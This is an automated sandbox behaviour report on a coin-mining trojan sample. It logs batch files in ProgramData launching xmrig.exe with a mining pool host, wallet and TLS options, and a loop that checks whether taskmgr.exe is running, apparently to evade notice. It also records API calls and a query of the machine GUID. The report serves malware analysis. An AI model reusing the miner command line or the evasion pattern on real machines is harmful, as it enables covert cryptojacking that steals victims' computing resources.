Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\process.bat" "			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\Drivers\xmrig.exe xmrig.exe --donate-level 5 -o pool.supportxmr.com:443 -u 49LzTohDTP4MAvjfeeKB7pecfkp8MppQKZu5yjawPHfH2aJFbLhgV459XX9y3qoAmjJvxiewcw2bK2toFoMVEAQSLB878rm -k --tls -p speed
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\watch.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: conhost.exe, 0000000E.00000002.4860564514.0000022F750C1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: conhost.exe, 0000000E.00000002.4860564514.0000022F750C1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 0000000E.00000002.4860564514.0000022F750C1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: conhost.exe, 0000000E.00000002.4860564514.0000022F750C1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Code function: 0_2_00007FF717565540 cpuid

0_2_00007FF717565540

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_00007FF717549F2C

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Code function: 0_2_00007FF7175503B4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF7175503B4

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exe

Code function: 0_2_00007FF717534F18 GetVersionExW,

0_2_00007FF717534F18

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior